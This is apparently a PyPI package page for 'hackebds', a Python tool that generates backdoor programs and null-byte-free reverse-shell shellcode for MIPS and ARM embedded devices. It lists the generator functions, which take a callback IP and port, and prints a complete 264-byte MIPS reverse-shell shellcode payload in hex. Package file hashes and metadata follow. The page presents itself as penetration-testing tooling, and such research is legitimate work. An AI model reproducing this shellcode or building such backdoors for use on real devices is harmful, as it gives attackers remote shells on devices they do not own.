This tool is used for backdoor and shellcode generation for various architecture devices
Project description
introduction
foreword
In the process of penetration and vulnerability mining of embedded devices, many problems have been encountered. One is that some devices do not have telnetd or ssh services to obtain an interactive shell, and the other is that memory corruption vulnerabilities such as stack overflow are usually Null bytes are truncated, so it is more troublesome to construct reverse_shellcode, so this tool was developed to exploit the vulnerability. This tool is developed based on the PWN module and currently uses the python2 language
fuction
This tool is embedded in the security test of the device. There are two main functions:
-
Generate backdoor programs of various architectures. The backdoor program is packaged in shellless pure shellcode and is smal in size.Armv5, Armv7, Armv8, mipsel, mips are now supported, and they are still being updated
-
Generate reverse_shell shellcode of various architectures during the exploit process, and no null bytes, which facilitates the exploitation of memory corruption vulnerabilities on embedded devices. Armv5, Armv7, Armv8, mipsel, mips are now supported, and they are still being updated
install (1) Highly recommended!!Because the source code compilation may not be updated in time,Please install the latest
pip install hackebds==0.0.7
pip install hackebds==0.0.7
....
Instructions for use
When importing this module will import the pwn module
- Generate backdoor programs of various architectures, encapsulate pure shellcode, and successfully connect to the shell
>>> from hackebds import *
>>> mipsel_backdoor(reverse_ip,reverse_port)
>>> mips_backdoor(reverse_ip,reverse_port)
>>> aarch64_backdoor(reverse_ip,reverse_port)
>>> armelv5_backdoor(reverse_ip,reverse_port)
>>> armelv7_backdoor(reverse_ip,reverse_port)
>>> armebv5_backdoor(reverse_ip,reverse_port)
>>> armebv7_backdoor(reverse_ip,reverse_port)
expample:
>>> mipsel_backdoor("127.0.0.1",5566)
mipsel_backdoor is ok in current path ./
>>>
- Generates the use-back shellcode (no free) null bytes corresponding to various architectures
>>> from hackebds import *
>>> mipsel_reverse_sl(reverse_ip,reverse_port)
>>> mips_reverse_sl(reverse_ip,reverse_port)
>>> aarch64_reverse_sl(reverse_ip,reverse_port)
>>> armelv5_reverse_sl(reverse_ip,reverse_port)
>>> armelv7_reverse_sl(reverse_ip,reverse_port)
>>> armebv5_reverse_sl(reverse_ip,reverse_port)
>>> armebv7_backdoor(reverse_ip,reverse_port)
example:
>>> from hackebds import *
>>> shellcode=mipsel_reverse_sl("127.0.0.1",5566)
[+] No NULL byte shellcode for hex(len is 264):
\xfd\xff\x19\x24\x27\x20\x20\x03\xff\xff\x06\x28\x57\x10\x02\x34\xfc\xff\xa4\xaf\xfc\xff\xa5\x8f\x0c\x01\x01\x01\xfc\xff\xa2\xaf\xfc\xff\xb0\x8f\xea\x41\x19\x3c\xfd\xff\x39\x37\x27\x48\x20\x03\xf8\xff\xa9\xaf\xff\xfe\x19\x3c\x80\xff\x39\x37\x27\x48\x20\x03\xfc\xff\xa9\xaf\xf8\xff\xbd\x27\xfc\xff\xb0\xaf\xfc\xff\xa4\x8f\x20\x28\xa0\x03\xef\xff\x19\x24\x27\x30\x20\x03\x4a\x10\x02\x34\x0c\x01\x01\x01\xf7\xff\x85\x20\xdf\x0f\x02\x24\x0c\x01\x01\x01\xfe\xff\x19\x24\x27\x28\x20\x03\xdf\x0f\x02\x24\x0c\x01\x01\x01\xfd\xff\x19\x24\x27\x28\x20\x03\xdf\x0f\x02\x24\x0c\x01\x01\x01\x69\x6e\x09\x3c\x2f\x62\x29\x35\xf8\xff\xa9\xaf\x97\xff\x19\x3c\xd0\x8c\x39\x37\x27\x48\x20\x03\xfc\xff\xa9\xaf\xf8\xff\xbd\x27\x20\x20\xa0\x03\x69\x6e\x09\x3c\x2f\x62\x29\x35\xf4\xff\xa9\xaf\x97\xff\x19\x3c\xd0\x8c\x39\x37\x27\x48\x20\x03\xf8\xff\xa9\xaf\xfc\xff\xa0\xaf\xf4\xff\xbd\x27\xff\xff\x05\x28\xfc\xff\xa5\xaf\xfc\xff\xbd\x23\xfb\xff\x19\x24\x27\x28\x20\x03\x20\x28\xa5\x03\xfc\xff\xa5\xaf\xfc\xff\xbd\x23\x20\x28\xa0\x03\xff\xff\x06\x28\xab\x0f\x02\x34\x0c\x01\x01\x01
chips and architectures
Tests can leverage chips and architectures
Mips: MIPS 74kc V4.12 big endian MIPS 24kc V5.0 little endian
Armv7: Allwinner(全志)V3s
Armv8: Qualcomm Snapdragon 660
updating
2022.4.19 Added support for aarch64 null-byte reverse_shellcode 2022.4.30 Reduced amount of code using functions and support python3
One-click build environment
To be added
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distributions
File details
Details for the file hackebds-0.0.8.tar.gz.
File metadata
- Download URL: hackebds-0.0.8.tar.gz
- Upload date:
- Size: 8.3 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/3.3.0 pkginfo/1.4.2 requests/2.25.1 setuptools/52.0.0 requests-toolbelt/0.9.1 tqdm/4.57.0 CPython/3.9.5
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 | be03b6165b8c7e6e118de40f009b922b48266dae3f884e2e93ac6a9a3f9ef100 |
|
| MD5 | 81f826fe02796705113a03f1fdb35d6c |
|
| BLAKE2b-256 | dbd2e81b79cca612934e9c65d42d286fd092805af61dcccd24c9bfe3f9c4c62c |
File details
Details for the file hackebds-0.0.8-py3.9.egg.
File metadata
- Download URL: hackebds-0.0.8-py3.9.egg
- Upload date:
- Size: 15.7 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/3.3.0 pkginfo/1.4.2 requests/2.25.1 setuptools/52.0.0 requests-toolbelt/0.9.1 tqdm/4.57.0 CPython/3.9.5
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 | f67fbfaf102481771100cdccfdd7cb8b7a6d71caccd924990fd6b75f130cc5df |
|
| MD5 | 00edced034cc857288ccaa08c3e0d85d |
|
| BLAKE2b-256 | e92a742f6193ca81b25d5dd80bada8a79a4fbb2120edec29bb4a17d4e9984078 |
File details
Details for the file hackebds-0.0.8-py3-none-any.whl.
File metadata
- Download URL: hackebds-0.0.8-py3-none-any.whl
- Upload date:
- Size: 10.9 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/3.3.0 pkginfo/1.4.2 requests/2.25.1 setuptools/52.0.0 requests-toolbelt/0.9.1 tqdm/4.57.0 CPython/3.9.5
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 | fa94f789dfcd598630b80de00b1970a6072a19609c01ede1bdd8b6eed22c7325 |
|
| MD5 | 7877b9109354e729afe9abe24839f2dc |
|
| BLAKE2b-256 | e1ac68da093e95511610ac2022b0f171bae57b9c0cd4acdf7f9e58bce5630ebc |
